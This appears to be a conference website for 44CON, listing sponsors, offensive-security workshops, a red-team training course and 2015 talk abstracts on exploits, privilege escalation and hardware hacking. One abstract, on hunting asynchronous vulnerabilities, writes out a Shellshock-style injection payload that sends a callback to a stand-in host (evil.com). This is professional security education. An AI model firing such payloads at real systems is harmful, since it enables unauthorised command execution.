          44CON CYBER SECURITY 2015 Sponsors

          Platinum Sponsors
          NCC Group

          http://www.nccgroup.com

          NCC Group is a leading global information assurance company, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.

          Digital Shadows

          http://www.digitalshadows.com

          Digital Shadows is a cyber intelligence company that protects organisations from data loss and targeted cyber attack. By applying our award-winning blend of expertise and technology we enable organisations to exploit social, cloud and mobile technologies while keeping their security and reputations intact. Our managed services monitor millions of data sources across the visible and dark web to deliver focussed, relevant intelligence about the risks you need to mitigate.

          F-Secure

          http://f-secure.com

          F-Secure are an online security and privacy company, founded in 1988 in Finland. Trusted by millions of users worldwide, F-Secure are pioneers in providing Security as a Service to SMBs as well as one of the first to introduce mobile security into the market.
          Due to their flexibility, technical competence and ease of management, F-Secure are market leaders within the Internet Service Provider and Mobile Operator space, with over 250 operators, including Virgin Media and TalkTalk, choosing F-Secure solutions to protect their millions of customers.


          Exhibitors
          Logically Secure

          http://www.cyber-cpr.com

          CyberCPR is a safe haven where Incident Managers, Analysts, Executives and support staff can plan and coordinate cyber incident remediation activities. Designed by seasoned IR professionals, CyberCPR is designed to support staff so they can work faster and more efficiently on all aspects of IR, thus reducing organisational risks and saving money.

          Stroz Friedberg

          http://www.strozfriedberg.com/

          Founded in 2000, Stroz Friedberg is a global leader in investigations, intelligence, and risk management services. It offers an assembly of the brightest minds in the fields of digital forensics, cybercrime and incident response, security science, forensic accounting, compliance, due diligence, data disclosure and analytics.

          Cortex Insight

          http://www.cortexinsight.com/

          Cortex Insight is a high-end specialist end-to-end provider of security consulting services, offering a range of services designed to tackle security challenges faced by the Enterprise.

          CheckSec

          https://checksec.com/

          Our flagship product, Canopy – Security Assessment Manager, is focused on helping security teams organise and manage their security testing and assessments. Canopy introduces managed workflows into assessments, and also brings efficiencies to every engagement through reusable content (Vulnerability Knowledge-Base, Report Content, etc.), quickly converting tool results to findings, and report automation.

          PQChat

          https://pq-chat.com

          At Post-Quantum we specialise in offering post-quantum secure solutions. Our PQChat Enterprise secure messaging system uses our Never-The-Same technology based on the Robert McEliece cryptosystem.

          Context Information Security

          http://www.contextis.com

          Context is an independently operated cyber security consultancy, founded in 1998 and focusing on providing highly skilled consultants to help organisations with their information security challenges. We work with some of the world’s most high profile blue chip companies and government organisations.


          Event Supporters
          Royal Holloway

          https://www.royalholloway.ac.uk/isg/

          We have a long history of world-class research into all areas of information and cyber security and have a world-leading group of academics and industrial contacts. Our research has led to us being recognised as an Academic Centre of Excellence in Cyber Security Research (ACE-CSR). There are eight ACEs in the UK, chosen by a panel appointed by the EPSRC and GCHQ.

          Women In Security

          http://www.isc2chapter-london.co.uk/women-in-security

          The Women in Security group is an exciting initiative formed by professionals of the Information Security field. The mission of the group is to raise the profile of women in the information security industry.

          IISP

          https://www.iisp.org/

          The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole.

          ISSA

          http://www.issa-uk.org/

          The Information Systems Security Association (ISSA)® is a not-for-profit, international organisation of information security professionals. It provides networking, educational forums, research opportunities, publications, and speaking opportunities that enhance the knowledge, skill and professional growth of its members. ISSA bills itself as the community of choice for international security professionals.

          White Hat Rally 2015: Way Out West

          http://info.whitehatrally.org

          From the Welsh borders, to the west coast, from north to south, with castles, dragons and some amazing challenges we are taking on the wild west frontier over the long weekend 18 – 20 September 2015.


          Media Partners
          IT Security Guru

          http://itsecurityguru.org

          IT Security Guru is a website containing industry news, blogs, videos, jobs and links to the best stories on the internet. Every day we look at the big stories, talk to the key people and bring the main topics to the end-user audience. Since we relaunched our website in January 2014 we have been delighted to support community events such as 44CON and we look forward to being involved in the build up to the show and attending the conference in September.


          Event Partners
          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts; Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder, it became quickly apparent after moving to London, that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple – to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides, a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          Attending

          Our next event is 44CON 2019 on 11th, 12th & 13th of September 2019. It will take place at the ILEC Conference Centre, London and will kick off on Wednesday 11th September at 6:30pm with our Community Evening. Registration will start at 6pm.

          Entry is free on Wednesday evening but you will have to register beforehand (details closer to the event).

          Press registration is handled separately to normal attendance registration. Please see here for more info.

          Mark your calendars:

          Next 44CON Conferences will take place:

          • 2019: 11th, 12th & 13th of September 2019
          • 2020: 9th, 10th & 11th of September 2020

          In the spirit of making 44CON safe and enjoyable for everyone, please ensure you adhere to our house rules at all times at and around the event.

          More information will be added to this page as it becomes available so please check it regularly. You can also keep a look out on our twitter page @44CON or sign up to our mailing list where you will be the first to know about all things 44CON.

          44CON 2017 Workshops

          ARM Assembly and Shellcode Basics

          Presented by: Saumil Shah

          A two hour workshop on writing ARM Shellcode from scratch. This workshop will cover some simple ARM assembly, and then two shellcode examples: A simple execve() shell and a fully working Reverse Shell. The shellcode will be tested in an ARM QEMU Emulator as well as on actual ARM hardware.

          Participants will be provided with ARM images running on QEMU for testing their shellcode. A shared Raspberry Pi-2 cluster will be made available for testing the shellcode on proper ARM hardware. Participants are encouraged to also bring their Raspberry PI-2 devices to the workshop.

          Introduction to Windows Logical Privilege Escalation

          Presented by: James Forshaw

          This workshop will go through an introduction to finding and exploiting logical privilege escalation vulnerabilities on Windows. More and more code running on Windows is done inside sandboxes or as non-administrators. This makes privilege escalation more important than ever. Memory corruptions are a common way of gaining higher privileges but Windows has been introducing more mitigations making exploitation harder. Logical vulnerabilities on the other hand are typically not affected by mitigations such as ASLR or DEP, but they’re generally more difficult to find. As an added complication they cannot be easily discovered through typical fuzzing approaches. Some of the topics to be presented will be:

          • Windows Internals as relevant to privilege escalation
            • Types of sandboxes, restricted and low box tokens
            • Under the hood
          • Attack surface analysis:
            • Probing the sandbox and the system
            • COM services
            • Exposed device drivers
          • File and registry vulnerabilities
            • How to find them and what to look for
            • Exploitation
          • Token vulnerabilities
            • How to find them and what to look for
            • Exploitation
          • UAC and unusual unfixed vulnerabilities
          • Working examples based on previous vulnerabilities

          Attendees are welcome to participate through the workshop by having access to a Windows 10 32 bit VM installation. Access to all tools and examples demonstrated on the day will be provided.

          UAC 0day, all day!

          Presented by: Ruben Boonen

          This workshop is available to attendees of all levels; however, a basic familiarity with Process Monitor and the Windows API is recommended. The workshop will provide the required knowledge to find, analyze and exploit process workflows which allow an attacker to elevate their privileges from Medium to High integrity. The workshop is divided into the following sections.

          Auto-Elevation:

          • Identifying auto-elevating processes
          • Analyzing process workflows
          • Finding UAC bypass targets

          Elevated File Operations:

          • Using the IFileOperation COM object
          • Tricking the Process Status API (PSAPI)

          Getting UAC 0day (Pre RS2):

          Looking forward:

          • Triaging Windows 10 Redstone 2
          • Leaving IFileOperation behind
          • COM objects & Fileless elevation

          The workshop has intense hands-on labs where attendees will put the theory into practice. After attending you will immediately be able to apply this knowledge in the field. The next time someone tells you the default UAC settings are sufficient you will be able to set them straight!

          Breaking Crypto the Easy Way With FeatherDuster

          Presented by: Daniel Crowley

          While there is a very large and rich body of academic work in cryptography, there is a comparatively small body of work regarding practical cryptographic issues. While it’s useful, possible, interesting, and even easy at times to apply 10 year old attacks to modern applications and systems, it doesn’t make for a good thesis paper. There’s also a general reluctance from application security folk to learn cryptography.

          FeatherDuster is a tool which attempts to bridge the gap between cryptographers and application security professionals by making crypto review and exploitation as simple as possible, like Metasploit for crypto. In some cases, FeatherDuster can identify and exploit practical crypto flaws given nothing other than a series of encrypted messages.

          This workshop will show attendees how to use FeatherDuster, from the easy-mode button that is FeatherDuster’s autopwn feature, all the way to writing your own FeatherModules and Python scripts which leverage FeatherDuster’s cryptanalysis module, Cryptanalib.

          Developing Burp Suite Extensions

          Presented by: Luca Carettoni

          This workshop covers building Burp Suite extensions from start to finish. Starting with an introduction to Burp Suite, the Burp Extender and the Burp Suite APIs, the workshop will then cover setting up the IDE and generating a basic “Hello Burp” extension, and then move on to how to build a simple Burp Scanner extension.

          The workshop is suitable for both web application security specialists and developers. Attendees are expected to have a rudimentary understanding of Burp Suite as well as basic Object-Oriented Programming experience. While Burp extensions are developed live in Java, attendees can work in Python or Ruby since all exercises are also provided in those languages.

          Attendees should bring their own laptop with the latest Java JDK installed, and a working IDE. While we develop in NetBeans, Eclipse and IDEA are also good alternatives.

          Reverse Engineering Windows Malware 101 Workshop

          Presented by: Amanda Rousseau

          Reverse engineering already sounds like black magic, when in reality it’s just lots of practice and strong foundations in computer science concepts. You might not always remember what you learned in computer science classes or have understood it enough to actually apply it to the real world. The best way to learn is by getting hands-on practice. In this workshop, the main takeaway is learning how to set analysis goals. By using tools and computer science concepts you can work step by step towards those analysis goals. This workshop provides the fundamentals of reverse engineering (RE) Windows malware using a hands-on experience with RE tools and techniques. Attendees will be introduced to RE terms and processes, followed by creating a basic x86 assembly program, and reviewing RE tools and malware techniques. The workshop will conclude with attendees performing hands-on malware analysis that consists of Triage, Static, and Dynamic analysis.

          Prerequisites: Basic understanding of programming C/C++, Python, or Java
          Requirements: Laptop with an OS that supports VirtualBox, and wifi connection
          Provided: A virtual machine and tools will be provided

          Cracking HiTag2 Crypto – Detailed Look at the Academic Attacks

          Presented by: Kevin Sheldrake

          NOTE: The corresponding talk “Cracking HiTag2 Crypto – Weaponising Academic Attacks for Breaking and Entering” is a pre-requisite for this workshop. You must attend the talk if you plan to attend the workshop.

          HiTag2 is an RFID technology operating at 125KHz.  It is distinguished from many others in the same field by its use of 2-way communications for authentication and its use of encryption to protect the data transmissions – the majority of RFID technologies at 125KHz feature no authentication or encryption at all.  As a result it has been widely used to provide secure building access and has also been used as the technology that implements car immobilisers.

          In 2012, academic researchers Roel Verdult, Flavio D. Garcia and Josep Balasch published the seminal paper, ‘Gone in 360 Seconds: Hijacking with Hitag2’ that presented three attacks on the encryption system used in HiTag2.  They implemented their attacks on the Proxmark 3 device (an RFID research and hacking tool) and gave several high-profile demonstrations, but didn’t release any of their code or tools.  Since then, the forums supporting Proxmark 3 and RFIDler (another RFID hacking tool) have received many requests for implementations of these attacks, but so far none have been forthcoming.

          In this workshop I will explain how HiTag2 RFID works in detail, including the PRNG and the authentication and encryption protocols, and will present my own implementations of the attacks, written for RFIDler and supported by desktop computers.  The first attack uses a nonce replay to misuse the integrity protection of the comms in order to allow access to the readable RFID tag pages without needing to know the key.  The second and third attacks use time/memory trade-off brute force and cryptanalytic attacks to recover the key, such that the contents of the read-protected pages can also be accessed.  The attacks are weaponised and permit cloning of tags, which I will demonstrate.

          All tools will be publicly released.

          A Hands On Introduction To Software Defined Radio

          Presented by: Didier Stevens

          Software Defined Radio is a fascinating playfield for hackers. But the learning curve is steep, and SDR devices are expensive. This two hour hands on workshop introduces SDR via a gentle learning curve, and with cheap devices, so that everyone can participate. Operating SDRs via the open source software GNU Radio offers a wealth of possibilities, but it is hard for beginners to start with GNU Radio. You need a good grasp of the radio concepts to find your way through the software. SDR is quite different from analogue radio, and for most attendees, even analogue radio is quite mysterious.

          With GNU Radio and GNU Radio Companion, I will guide the attendees through a set of exercises (specially designed for this workshop) intended to familiarize them with radio technology, SDR, GNU Radio and GNU Radio Companion. Each attendee should bring their own laptop and Didier will supply 20 cheap SDR devices (USB digital TV receivers RTL2832U) and a couple of more performant devices, like the HackRF One, a WiSpy, and a handheld digital spectrum analyzer. We will boot from a Live CD and start with simple exercises to understand SDR. Because of the limited number of devices (20 devices), the workshop is limited to 20 attendees. But attendees can bring their own RTL2832U.

          How to Hack Radios: Hands-On with RF Physical Layers

          Presented by: Matt Knight and Marc Newlin

          The Age of the Radio is upon us: wireless protocols are a dime a dozen thanks to the explosion of mobile devices and the Internet of Things. While proprietary wireless solutions may offer performance benefits and cost savings over standards like 802.11 or Bluetooth, their security features are rarely well-exercised due to a lack of access to these interfaces. The adoption of Software Defined Radio (SDR) by the security research community has helped shift this balance, however SDR remains a boutique skillset. Join us as we lift the veil on SDR and show that a PhD is not needed to pwn the Internet of Things’ Radios.

          This workshop offers an applied tutorial on how to apply Software Defined Radio, with an emphasis on the “Radio” part. Rather than glazing over RF basics, we will frame our entire discussion about reverse engineering wireless systems around digital radio fundamentals.

          We begin with an offensively short crash course in digital signal processing and RF communication, covering just enough to be dangerous, before introducing a reverse engineering workflow that can be applied to just about any IoT wireless system. The bulk of this session will demonstrate how this workflow can be applied to recover and inject packets from/into a variety of devices with proprietary modulations by walking through it, live and in detail, with attendees actively contributing to reverse-engineered solutions and working along in parallel.

          Attendees should expect to walk away with practical knowledge of how to apply SDR to examine and deconstruct proprietary wireless protocols. We encourage attendees to bring along their own SDR hardware, though we’ll provide a handful of RTL-SDRs and live USB images for those who lack equipment. Finally, we will release all GNU Radio flowgraph templates and shell scripts for further hacking and development.

          Capture-The-Flag 101

          Presented by: Olivier Bilodeau

          This workshop is a deep-dive into Capture-The-Flag (CTF) competitions for CTF first timers. It will introduce CTFs and then assist both teams and individuals prepare for them and evolve their applied cybersecurity skills in the process.

          The workshop will have various levels (easy, medium, hard) of CTF challenges in several categories (binaries, Web, crypto) and hints and solutions will be provided during the workshop.

          Advanced Windows Tradecraft

          Presented By: Nikhil Mittal

          Organizations with a mature security model want to test their security controls against sophisticated adversaries. Red teams that want to simulate such adversaries need an advanced tradecraft. Such a tradecraft must include the ability to adapt to the target environment, modify existing tactics and techniques to avoid detection, swiftly switch between tools written in different languages supported on Windows, break out of restrictions, utilize functionality abuse and keep up with the game of bypassing countermeasures. If you want to take your Windows tradecraft to the next level then this is the course for you.

          This training takes you through a tradecraft for Red Teaming a Windows environment with nothing but trusted OS resources and languages. We will cover multiple phases of a Red Team operation like initial foothold, enumeration, privilege escalation, persistence, lateral movement, exfiltration etc. in a fully updated and patched lab with countermeasures enabled.

          The 3 day course will take place on the 9th, 10th and 11th of September 2019 at the Novotel London West.
          Cost is £1,950 (inc VAT). Buy your place in our shop now.

          Learning Objectives

          Some of the topics covered in the class:

          • Offensive C#, PowerShell, Jscript/VBScript
          • Bypassing Application Whitelisting
          • Bypassing host countermeasures
          • Evading process tree based detection
          • Evading advanced logging (Command line, PowerShellv5, Sysmon etc.)
          • In-memory assembly and shellcode execution
          • Offensive WMI
          • COM hijacking
          • Advanced Client Side Attacks on restricted and secure environments
          • Local and domain privilege escalation

          Attendees will get free one month access to a lab configured like an enterprise environment during and after the training.

          Course Outline

          Day 1:

          • Introduction to the methodology
          • Windows as an attack platform
          • Offensive PowerShell
          • PowerShell without powershell.exe
          • Offensive C#
          • Offensive Jscript/VBScript
          • Offensive WMI

          Day 2:

          • COM Hijacking
          • Bypassing application whitelisting
          • Bypassing host countermeasures
          • Evading process tree based detection
          • Evading advanced logging (Command line, PowerShellv5, Sysmon etc.)
          • Advanced Client Side Attacks in restricted environment (AWL and ASR enabled)

          Day 3:

          • Local and Domain privilege escalation
          • Persistence (on host, domain and forest)
          • Advanced Lateral Movement
          • Defenses and Detection

          Target Audience

          Red teamers and penetration testers who want to take their Windows tradecraft to the next level will find this course very useful. Blue teamers and security professionals who want to understand how sophisticated adversaries target their organization should take this course.

          Student Requirements

          • Prior experience with Red Teaming or penetration testing.
          • Prior experience with using Windows as an attack platform will be helpful.

          What to Bring

          • System with 4 GB RAM and ability to install OpenVPN client and RDP to Windows boxes. Privileges to disable/change any antivirus or firewall.

          Students will be provided with

          • Attendees will get free one month access to a lab configured like an Enterprise environment during and after the training.
          • Free one month subscription to all courses on PentesterAcademy.com.
          • Free one month access to non-premium labs on AttackDefense.com

          About the Trainer

          Lead Instructor – Nikhil Mittal

          Nikhil Mittal is a hacker, infosec researcher, speaker, blogger and enthusiast. His area of interest includes red teaming, active directory security, attack research, defense strategies and post exploitation research. He has 10+ years of experience in red teaming.

          He specializes in assessing security risks at secure environments that require novel attack vectors and an “out of the box” approach. He has worked extensively on Active Directory attacks, defense and bypassing detection mechanisms and Offensive PowerShell for red teaming. He is the creator of multiple tools like Nishang, a post exploitation framework in PowerShell, and Deploy-Deception, a framework for deploying Active Directory deception. In his spare time, Nikhil researches new attack methodologies and updates his tools and frameworks.

          Nikhil has held trainings and boot camps for various corporate clients (in US, Europe and SE Asia), and at the world’s top information security conferences.

          He has spoken/trained at conferences like Defcon, BlackHat, CanSecWest, BruCON, 44CON and more.

          Book your 44CON 2019 training course now!

          44CON London 2015 Training

          All training courses are run on the 7th – 15th September 2015 at TBC venue

          Presented by: Saumil Shah

          A class about the art and craft of vulnerability discovery and subsequent exploit development. It’s an intense hands on course.

          Course Length: 3 days

          Presented by: MDSec (Marcus Pinto)

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days

          Presented by: Dominic Chell

          The course follows chapters 1-9 of the Mobile Application Hacker’s Handbook, with a strong focus on practical attacks. Over the 2-day training course delivered by the lead author of the book, delegates will learn the tricks and techniques to hack mobile applications on the iOS and Android platforms.

          Course Length: 2 days

          Presented by: Andrea Barisani

          The ARM® TrustZone® technology, in contrast to traditional TPMs, allows developers to engineer custom trusted platform modules by enforcing domain separation, between the “secure” and “normal” worlds, that propagates throughout System on a Chip (SoC) components, and therefore not only limited to the CPU core. Students will gain first hand experience on the low level concepts and ARM assembly required to audit and utilize implementations of the TrustZone® technology.

          Course Length: 1 day

          44CON LONDON 2015 Presentations

          Most of the presentations are available to view on Vimeo.

          Meterpreter: Understanding the New Shiny

          Presented By: OJ Reeves

          The last couple of years have seen Meterpreter move forward leaps and bounds when it comes to new features and stability. Metasploit users worldwide continue to make use of it for its core feature set that is already well known, but are yet to benefit from the new features that are starting to make it a more compelling tool for red team engagements.

          The goal of this talk will be to bring people up to speed on how Meterpreter has changed, evolved and become what it is in 2015. Old features will be covered, and new features will be discussed in depth, with a focus on how those new features can be used to help red teamers establish and maintain a stronger foothold in their target’s network.

          This presentation will not only discuss the features at a high level, but will also dive deeper into some of the more technical details around the new and more interesting features, including stageless payloads, transport modification, paranoid mode, and persistence. It will also cover some of the common pitfalls that cause shells to fail, and how to avoid them.

          It may even cover a sneak peek of what’s to come further down the track!


          Windows 10: 2 Steps Forward, 1 Step Back

          Presented By: James Forshaw

          Windows 10 is shaping up to be one of the most secure consumer operating systems yet; it includes many new security features baked in, such as Control Flow Guard and Credentials Isolation. But new features have a habit of coming with additional bugs which only serve to reduce the security of the system at the same time.

          This presentation will describe a few of the new security features introduced into Windows 10 as well as some of the vulnerabilities I’ve discovered which demonstrate that secure engineering is still very difficult in practice.


          Exploiting 64-bit IE on Windows 8.1 – The Pwn2Own Case Study

          Presented By: Yuki Chen and Linan Hao

          Instead of 32-bit IE, this year’s Pwn2Own competition selected 64-bit Internet Explorer as the target for the first time. 64-bit IE brings new challenges to exploit writers; for example, a simple heap spraying technique will not work in a 64-bit process. And in order to win the game, we also need to bypass the control flow guard (CFG) mitigation on Windows 8.1 as well as the enhanced protected mode (EPM) sandbox of IE.

          In this presentation, we will disclose the details of the 2 vulnerabilities we used to take down 64-bit IE in Pwn2Own 2015 for the first time. We will go through the PoC exploit to demonstrate the techniques we used to work out a working IE 64-bit exploit. We will show how we achieved ASLR & CFG bypass and remote code execution in 64-bit IE with a single uninitialized memory bug. We will also discuss the bug we used to bypass IE’s EPM sandbox to achieve elevation of privilege.


          Barbarians At The Gate(way): An Examination Of The Attacker’s Tool Box

          Presented By: Dave Lewis

          This talk will examine the tools, methods and data behind the DDoS attacks that are prevalent in the news headlines. Using information collected, the presentation will demonstrate what the attackers are using to cause their mischief & mayhem, and examine the timeline and progression of attackers as they move from the historical page defacers to the motivated DDoS attacker.

          We will look at the motivations and rationale that they have and try to share some sort of understanding as to what patterns to be aware of for their own protection.


          Smart Muttering; a story and toolset for smart meter platform

          Presented By: Ian de Villiers

          The use of smart meters and their associated technologies is becoming more widespread as utility providers struggle to deal with ever growing demand and scarcer resources. The European Union has deployed over 46 million smart meters to date, with an additional 119 million smart meters intended to be deployed in member countries by 2019. Likewise, in the United States of America, there are indications that the number of smart meters deployed had topped the 50 million mark in mid-July 2014.

          Previous work has shown security and privacy concerns with smart metering specifically, with researchers at IOActive even developing a “Smart Grid Worm”. However, this work has done little to open either smart meter research to a wider audience, or provide tools for approaching new platforms and devices.

          To address this, we developed a pluggable framework and an easy-to-build, low-cost hardware platform for embedded device protocol analysis and manipulation, both of which will be released under an open-source license during the talk.

          Whilst smart devices have been developed for managing resources, their functionality has also been found to be applicable to other spheres, resulting in technologies (based on, or similar to smart technologies) often being found in other applications. Some smart device platforms are also used in process management applications, and even transport management systems. The resources governed by these systems are regarded as critical infrastructure by most governments. Disruption of these systems could result in significant damage to national infrastructure – or even political instability in a region targeted by attackers. In addition to smart networks, the advent of the so-called “Internet of Things”, has added a plethora of new devices to home networks. Thus these technologies are responsible for securing access to both nation-state as well as residential resources, making research in this area an important concern.

          Given the present and growing criticality of these devices, we embarked on a lengthy assessment of the popular LonMark platform as implemented in the Echelon Series 5000-based devices with the aim of discovering platform-wide vulnerabilities that could be used to attack devices or their backend management platforms.

          However, few to no tools exist for assessing devices making use of obscure networks or protocols. Currently, attacking smart meters, interconnected hardware and associated applications is not as simple as firing up a web proxy and intercepting traffic, as is the case with web applications, something this talk hopes to change. In most cases, the devices communicate over mediums researchers may not be familiar with and may use custom protocols, resulting in difficulties obtaining access to network communication streams.

          To counter these obstacles, I will present various mechanisms for assessing the security of obscure networks, protocols and devices. This will be performed using off-the-shelf hardware and a custom framework for conducting this type of work.

          This toolset, the result of thousands of hours worth of research, will provide functionality for conducting traditional sniffing, replay and fuzzing attacks against devices making use of wired connections. Using this framework, the analyst will practically demonstrate attacks against the smart devices used during the course of this research.


          How to drive a malware analyst crazy

          Presented By: Michael Boman

          This talk will discuss the different methods malware authors use to complicate the malware forensics / reverse engineering. It will discuss both the history of anti-forensics and what is being used today.


          Playing with Fire: Attacking the FireEye MPS

          Presented By: Felix Wilhelm

          This talk will give an overview of a number of vulnerabilities in FireEye’s Malware Protection System (MPS) that were recently discovered (and which are patched in the interim). These range from command injections in the management web interface over local privilege escalation vulnerabilities to exploits that allow a full compromise of the system by simply sending a malicious file over the network and exploiting bugs in the analysis process.

          We will discuss the inherent attack exposure of certain types of network security controls, together with architectural recommendations on how those could be addressed.


          Is there an EFI monster inside your apple?

          Presented By: Pedro Vilaça

          I publicly disclosed an Apple EFI firmware zero day.

          It was a very powerful bug allowing direct access to the EFI firmware from the operating system. EFI rootkits are some of the most powerful and most interesting rootkits. Because they work at a very low level they can play a lot of tricks to hide themselves from forensics and persist for a long time.

          EFI monsters are a bit like jaguars, stealthy and rarely seen by humans. This doesn’t mean they do not exist. EFI monsters are most certainly part of spy agencies’ rootkit catalog. Very few tools exist to chase them.

          This talk is about introducing you to the EFI world so you can also start to chase these monsters. EFI world might look scary but it’s a bit easier than you think and a lot of fun.


          DDoS mitigation EPIC FAIL collection

          Presented By: Moshe Zioni

          I have been researching DDoS attacks and mitigation techniques for the past three years and worked with industry leaders on testing their systems, providing them with cutting edge, and even never-seen-before attacks.

          I was amazed (actually still am) to find out that those big corporations, investing much work into their architecture of defense, came to FAIL, and sometimes the sole reason for a successful attack was a mitigation configuration or architecture FAIL. My research is done by utilizing smart grids of computers, mimicking vast botnets from all over the world, writing and perfecting scripted attacks and even involving social engineering attempts within those attacks (for mitigation that involves manual intervention). In the presentation there will be a showcase of 10 such FAILs, detailed technically as for a step-by-step close follow on the attack strategy and its mitigation failing, and of course – delving into a recommended setup for a proper mitigation technique that will not inflict such a direct damage as presented.


          Jtagsploitation: 5 wires, 5 ways to root

          Presented By: Joe FitzPatrick & Matt King

          JTAG comes up in nearly every hardware-related hack. In order to do anything via JTAG, you generally need a hardware debugging device that connects to anything from a standard header to undocumented test points scattered around a device. JTAG access is almost always ‘game over’ but it’s not always clear how to turn that hardware access into privileged software access on the system.

          This talk will enumerate a number of different ways to turn a ‘check’ for jtag access into the ‘checkmate’ of root shell access. Each example will demonstrate a unique method for getting root access via JTAG. Each method is also general enough to be broadly applicable across different hardware architectures and implementations. Example code and scripts will be released at the talk.


          Hunting Asynchronous Vulnerabilities

          Presented By: James Kettle

          In blackbox tests vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms like blind second order SQL injection and shell command injection via nightly cronjobs or asynchronous logging functions can easily survive repeated pentests and arrive in production unfixed.

          The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen.

          In this presentation, I’ll show that exploit-induced callbacks can be taken far beyond () { :;}; echo 1 > /dev/udp/evil.com/53 to find blind and asynchronous XXE, (DOM)XSS, SQLi, SMTP and even pure XML injection. I’ll examine a range of techniques to coax applications into issuing a callback by any means possible. These will start out clean and simple and quickly degenerate into crude cross-technology/platform multi-context exploit chains, some of which are definitely not advisable for production servers.

          This presentation will also cover coping strategies for some of the innate hazards associated with hosting the infrastructure required to automate finding these vulnerabilities.


          Old Dog, New Tricks: Forensics With PowerShell

          Presented By: Jared Atkinson

          Recent intrusions into the networks of organizations like Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection, but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature to defenders to tackle live threats.

          In this workshop, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.


          Inside Terracotta VPN

          Presented By: Kent Backman

          Virtual Private Networks (VPNs) are very popular. They are part and parcel for almost every enterprise network, especially those with remote employees. Aside from VPNs for enterprises, there are many reputable commercial VPN services that offer low cost, reliable service to individual users. These users employ VPNs for reasons that might include connection security, protection of privacy data, online gaming acceleration, and bypassing service provider restrictions. VPNs are also popular with cyber criminals, as it is one way the latter can obscure their true source location. When a commercial VPN service provider uses resources such as servers and copious bandwidth stolen or repurposed from unsuspecting victims for purposes of profit, the offering clearly crosses into the criminal domain. In this report, FirstWatch exposes one such operator doing business with multiple VPN brand names out of the People’s Republic of China (PRC). At last count, the Terracotta VPN node ecosystem consisted of more than 1500 systems around the globe. Every Windows server running as a Terracotta VPN node that FirstWatch was able to verify was hacked.

          The operators behind Terracotta VPN continue their broad campaign to compromise multiple victim organizations around the world. Meanwhile, advanced threat actors such as Shell_Crew (Google RSA Shell_Crew for details) use Terracotta VPN to anonymize their activity while they hack the crap out of governments and commercial entities around the world. While RSA has yet to release the paper to the public, an earlier version of Inside Terracotta VPN was presented to Microsoft’s invitation-only Digital Crimes Consortium (DCC 2105) conference in Miami. This presenter will share with the 44CON London audience otherwise non-public information previously restricted to law enforcement on how this was discovered, and other stuff not appearing in the paper to be released by RSA (this summer).


          Hackers in the Wire and Drones Oh My!

          Presented By: Philip Polstra

          At the second 44CON Phil debuted The Deck, a penetration testing Linux distro for the BeagleBoard, BeagleBone, BeagleBone Black, and similar small computing devices. In this talk you will learn how to perform very powerful, yet inexpensive, penetration tests with an army of low-power ARM-based devices connected via a wireless, out-of-band, network. These devices range from wired/wireless dropboxes, to wired/wireless remote hacking drones, to flying remote hacking drones, to taps installed inline in the target’s data center. All of the action can be controlled from up to a mile away (Phil recommends poolside at a nearby hotel) or from anywhere in the world using gateways.

          Devices to be discussed include the BeagleBone Black, BeagleBoard xM, BeagleBoard X15, the Little Universal Network Appliance (LUNA), the Raspberry Pi 2, and aerial delivery platforms.


          Attacking VxWorks: from Stone Age to Interstellar

          Presented By: Yannick Formaggio

          VxWorks is the world’s most widely-used real-time operating system deployed in embedded systems. Its market reach spans across all safety critical fields, including the Mars Curiosity rover, Boeing 787 Dreamliner, and network routers, to name a few. The safety critical nature of these applications makes VxWorks security a major concern.

          Our team has conducted a thorough security analysis on VxWorks, including its supported network protocols and OS security mechanism. We will present the tool we developed for VxWorks assessment. The main goal of our tool is to provide effective penetration testing by implementing the WdbRPC protocol in Python. To show its effectiveness, we are going to reveal some of the bugs we discovered along the way.

          Finally, we will wrap up by demonstrating the vulnerability we found that allows remote code execution on most VxWorks based devices. A quick Internet scan shows that at least 100k devices running VxWorks are connected to the Internet. Considering the popularity of VxWorks in the age of IoT, this issue will have a widespread impact.


          reverse reverse engineering

          Presented By: Richo Healey

